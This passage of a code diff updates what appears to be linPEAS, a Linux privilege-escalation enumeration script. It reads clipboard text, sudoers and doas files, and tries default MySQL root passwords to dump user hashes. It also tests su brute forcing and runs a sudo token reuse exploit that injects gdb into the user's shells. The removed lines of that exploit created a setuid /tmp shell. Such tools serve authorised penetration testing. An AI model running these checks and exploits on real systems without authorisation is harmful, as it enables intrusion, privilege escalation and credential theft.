"s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -E "s,$idB,${C}[1;31m&${C}[0m,g" + (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31;103m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$idB,${C}[1;31m&${C}[0m,g" echo "" #-- UI) PGP keys? printf $Y"[+] "$GREEN"Do I have PGP keys?\n"$NC - gpg --list-keys 2>/dev/null || echo_not_found "gpg" + command -v gpg 2>/dev/null || echo_not_found "gpg" + gpg --list-keys 2>/dev/null + command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys" + netpgpkeys --list-keys 2>/dev/null + command -v netpgp 2>/dev/null || echo_not_found "netpgp" echo "" #-- UI) Clipboard and highlighted text printf $Y"[+] "$GREEN"Clipboard or highlighted text?\n"$NC - if [ `which xclip 2>/dev/null` ]; then - echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - elif [ `which xsel 2>/dev/null` ]; then - echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," - echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -E "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + if [ `command -v xclip 2>/dev/null` ]; then + echo "Clipboard: "`xclip -o -selection clipboard 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Highlighted text: "`xclip -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + elif [ `command -v xsel 2>/dev/null` ]; then + echo "Clipboard: "`xsel -ob 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," + echo "Highlighted text: "`xsel -o 2>/dev/null` | sed -${E} "s,$pwd_inside_history,${C}[1;31m&${C}[0m," else echo_not_found "xsel and xclip" fi echo "" @@ -1413,49 +1542,50 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Sudo -l printf $Y"[+] "$GREEN"Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC - (echo '' | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + (echo '' | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," | sed "s,\!root,${C}[1;31m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" if [ "$PASSWORD" ]; then - (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" + (echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "sudo" fi - (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers" + (cat /etc/sudoers | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m,") 2>/dev/null || echo_not_found "/etc/sudoers" if [ -w '/etc/sudoers.d/' ]; then - echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -E "s,.*,${C}[1;31;103m&${C}[0m," + echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," fi for filename in '/etc/sudoers.d/*'; do if [ -r "$filename" ]; then - echo "Sudoers file: $filename is readable" | sed -E "s,.*,${C}[1;31m&${C}[0m,g" - cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -E "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -E "s,$sudoVB,${C}[1;31;103m&${C}[0m," + echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + cat "$filename" | grep -v "^$" | grep -v "#" | sed "s,_proxy,${C}[1;31m&${C}[0m,g" | sed "s,$sudoG,${C}[1;32m&${C}[0m,g" | sed -${E} "s,$sudoB,${C}[1;31m&${C}[0m,g" | sed "s,pwfeedback,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sudoVB,${C}[1;31;103m&${C}[0m," fi done echo "" #-- UI) Sudo tokens printf $Y"[+] "$GREEN"Checking sudo tokens\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid\n"$NC + printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens\n"$NC ptrace_scope="`cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null`" if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "/proc/sys/kernel/yama/ptrace_scope is enabled (0)" | sed "s,0,${C}[1;31m&${C}[0m,g"; else echo "/proc/sys/kernel/yama/ptrace_scope is not enabled ($ptrace_scope)" | sed "s,is not enabled,${C}[1;32m&${C}[0m,g"; fi - is_gdb="`which gdb 2>/dev/null`" - if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -E "s,.*,${C}[1;31m&${C}[0m,g"; + is_gdb="`command -v gdb 2>/dev/null`" + if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g"; else echo "gdb wasn't found in PATH" | sed "s,gdb,${C}[1;32m&${C}[0m,g"; fi if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then echo "Checking for sudo tokens in other shells owned by current user" for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null) - echo 'call system("echo | sudo -S cp /bin/sh /tmp/shrndom >/dev/null 2>&1 && echo | sudo -S chmod +s /tmp/shrndom >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 + echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1 done - if [ -f "/tmp/shrndom" ]; then - echo "Sudo tokens exploit worked, you can escalate privileges using '/tmp/shrndom -p'" | sed -E "s,.*,${C}[1;31;103m&${C}[0m,"; + if [ -f "/tmp/shrndom32r2r" ]; then + rm /tmp/shrndom32r2r 2>/dev/null + echo "Sudo token reuse exploit worked! (see link)" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m,"; else echo "The escalation didn't work... (try again later?)" fi fi echo "" #-- UI) Doas - printf $Y"[+] "$GREEN"Checking /etc/doas.conf\n"$NC - if [ "`cat /etc/doas.conf 2>/dev/null`" ]; then cat /etc/doas.conf 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed "s,nopass,${C}[1;31m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," + printf $Y"[+] "$GREEN"Checking doas.conf\n"$NC + if [ "`cat /etc/doas.conf "$(dirname $(command -v doas) 2>/dev/null)/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/../etc/doas.conf" "$(dirname $(command -v doas) 2>/dev/null)/etc/doas.conf" 2>/dev/null`" ]; then cat /etc/doas.conf "$(dirname $(command -v doas))/doas.conf" "$(dirname $(command -v doas))/../etc/doas.conf" "$(dirname $(command -v doas))/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;31m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," | sed "s,nopass,${C}[1;31m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," else echo_not_found "/etc/doas.conf" fi echo "" @@ -1463,11 +1593,77 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- UI) Pkexec policy printf $Y"[+] "$GREEN"Checking Pkexec policy\n"$NC printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2\n"$NC - (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -E "s,$groupsB,${C}[1;31m&${C}[0m," | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m," | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed -E "s,$Groups,${C}[1;31;103m&${C}[0m,") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + (cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m," | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m," | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$Groups,${C}[1;31;103m&${C}[0m,") || echo_not_found "/etc/polkit-1/localauthority.conf.d" + echo "" + + #-- UI) Superusers + printf $Y"[+] "$GREEN"Superusers\n"$NC + awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Users with console + printf $Y"[+] "$GREEN"Users with console\n"$NC + if [ "$MACPEAS" ]; then + dscl . list /Users | while read uname; do + ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` + if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user + dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + fi + done + else + no_shells="`cat /etc/passwd 2>/dev/null | grep -Ev "sh$" | cut -d ":" -f 7 | sort | uniq`" + unexpected_shells="" + printf "$no_shells\n" | while read f; do + if [ "`$f -c 'whoami' 2>/dev/null | grep \"$(whoami)\"`" ]; then + unexpected_shells="$f\n$unexpected_shells" + fi + done + cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + if [ "$unexpected_shells" ]; then + echo "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + echo "Unexpected users with shells:" + printf "$unexpected_shells\n" | while read f; do + if [ "$f" ]; then + grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${C}[1;31m&${C}[0m,g" + fi + done + fi + fi + echo "" + + #-- UI) All users & groups + printf $Y"[+] "$GREEN"All users & groups\n"$NC + if [ "$MACPEAS" ]; then + dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + else + cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_grps,${C}[1;32m&${C}[0m,g" + fi + echo "" + + #-- UI) Login now + printf $Y"[+] "$GREEN"Login now\n"$NC + (w || who || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Last logons + printf $Y"[+] "$GREEN"Last logons\n"$NC + (last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;31m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Login info + printf $Y"[+] "$GREEN"Last time logon each user\n"$NC + lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "" + + #-- UI) Password policy + printf $Y"[+] "$GREEN"Password policy\n"$NC + grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" echo "" #-- UI) Brute su - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then + EXISTS_SUDO="`command -v sudo 2>/dev/null`" + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ] && [ "$EXISTS_SUDO" ]; then printf $Y"[+] "$GREEN"Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC POSSIBE_SU_BRUTE=`check_if_su_brute`; if [ "$POSSIBE_SU_BRUTE" ]; then @@ -1484,55 +1680,6 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then fi printf $Y"[+] "$GREEN"Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC echo "" - - #-- UI) Superusers - printf $Y"[+] "$GREEN"Superusers\n"$NC - awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;31;103m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Users with console - printf $Y"[+] "$GREEN"Users with console\n"$NC - if [ "$MACPEAS" ]; then - dscl . list /Users | while read uname; do - ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` - if [ "`grep \"$ushell\" /etc/shells`" ]; then #Shell user - dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - fi - done - else - cat /etc/passwd 2>/dev/null | grep "sh$" | sort | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - fi - echo "" - - #-- UI) All users & groups - printf $Y"[+] "$GREEN"All users & groups\n"$NC - if [ "$MACPEAS" ]; then - dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" - else - cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -E "s,$groupsB,${C}[1;31m&${C}[0m,g" | sed -E "s,$groupsVB,${C}[1;31m&${C}[0m,g" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m,g" | sed "s,$USER,${C}[1;95m&${C}[0m,g" | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m,g" | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m,g" | sed "s,root,${C}[1;31m&${C}[0m," | sed -E "s,$knw_grps,${C}[1;32m&${C}[0m,g" - fi - echo "" - - #-- UI) Login now - printf $Y"[+] "$GREEN"Login now\n"$NC - w 2>/dev/null | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Last logons - printf $Y"[+] "$GREEN"Last logons\n"$NC - last 2>/dev/null | tail | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Login info - printf $Y"[+] "$GREEN"Last time logon each user\n"$NC - lastlog 2>/dev/null | grep -v "Never" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," - echo "" - - #-- UI) Password policy - printf $Y"[+] "$GREEN"Password policy\n"$NC - grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs" - echo "" echo "" if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi fi @@ -1542,7 +1689,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ########################################### #--------) Software Information (---------# ########################################### - printf $B"===================================( "$GREEN"Software Information"$B" )===================================\n"$NC + printf $B"═══════════════════════════════════╣ "$GREEN"Software Information"$B" ╠═══════════════════════════════════\n"$NC #-- SI) Mysql version printf $Y"[+] "$GREEN"MySQL version\n"$NC @@ -1553,8 +1700,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $Y"[+] "$GREEN"MySQL connection using default root/root ........... "$NC mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi @@ -1562,8 +1709,8 @@ if [ "`echo $CHECKS | grep SofI`" ]; then printf $Y"[+] "$GREEN"MySQL connection using root/toor ................... "$NC mysqlconnect=`mysqladmin -uroot -ptoor version 2>/dev/null` if [ "$mysqlconnect" ]; then - echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," - mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi @@ -1571,32 +1718,32 @@ if [ "`echo $CHECKS | grep SofI`" ]; then mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` printf $Y"[+] "$GREEN"MySQL connection using root/NOPASS ................. "$NC if [ "$mysqlconnectnopass" ]; then - echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," - mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi #-- SI) Mysql credentials printf $Y"[+] "$GREEN"Searching mysql credentials and exec\n"$NC - mysqldirs=$(echo "$FIND_DIR_ETC $FIND_DIR_USR $FIND_DIR_VAR" | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -v "mysql/mysql") + mysqldirs=$(echo "$FIND_DIR_ETC\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_MNT" | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -v "mysql/mysql") if [ "$mysqldirs" ]; then printf "$mysqldirs\n" | while read d; do for f in `find $d -name debian.cnf 2>/dev/null`; do if [ -r $f ]; then - echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," cat "$f" fi done for f in `find $d -name user.MYD 2>/dev/null`; do if [ -r "$f" ]; then - echo "We can read the Mysql Hashes from $f" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password" fi done for f in `grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"`; do if [ -r "$f" ]; then u=`cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null` - echo "From '$f' Mysql user: $u" | sed -E "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -E "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -E "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," + echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed "s,$USER,${C}[1;95m&${C}[0m," | sed "s,root,${C}[1;31m&${C}[0m," fi done for f in `find $d -name my.cnf 2>/dev/null`; do @@ -1608,7 +1755,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then mysqlexec=`whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so"` if [ "$mysqlexec" ]; then echo "Found $mysqlexec" - echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -E "s,.*,${C}[1;31m&${C}[0m," + echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," fi done else echo_not_found @@ -1618,15 +1765,15 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) PostgreSQL info printf $Y"[+] "$GREEN"PostgreSQL version and pgadmin credentials\n"$NC postgver=`psql -V 2>/dev/null` - postgdb=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'pgadmin.*\.db$') - postgconfs=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_ROOT $FIND_TMP $FIND_USR $FIND_OPT $FIND_USERS $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$') + postgdb=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pgadmin.*\.db$') + postgconfs=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$') if [ "$postgver" ] || [ "$postgdb" ] || [ "$postgconfs" ]; then if [ "$postgver" ]; then echo "Version: $postgver"; fi - if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -E "s,.*,${C}[1;31m&${C}[0m,"; fi + if [ "$postgdb" ]; then echo "PostgreSQL database: $postgdb" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi printf "$postgconfs\n" | while read f; do if [ -r "$f" ]; then echo "Found readable $f" - cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -E "s,auth|password|md5|user=|pass=|trust,${C}[1;31m&${C}[0m," 2>/dev/null + cat "$f" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${C}[1;31m&${C}[0m," 2>/dev/null echo "" fi done @@ -1638,7 +1785,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it. #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using postgres/NOPASS ........ "$NC - if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E "s,.*,${C}[1;31m&${C}[0m," + if [ "`timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," else echo_no fi @@ -1648,12 +1795,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then fi printf $Y"[+] "$GREEN"PostgreSQL connection to template0 using pgsql/NOPASS ........... "$NC - if [ "`timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null`" ]; then echo "Yes" | sed -E 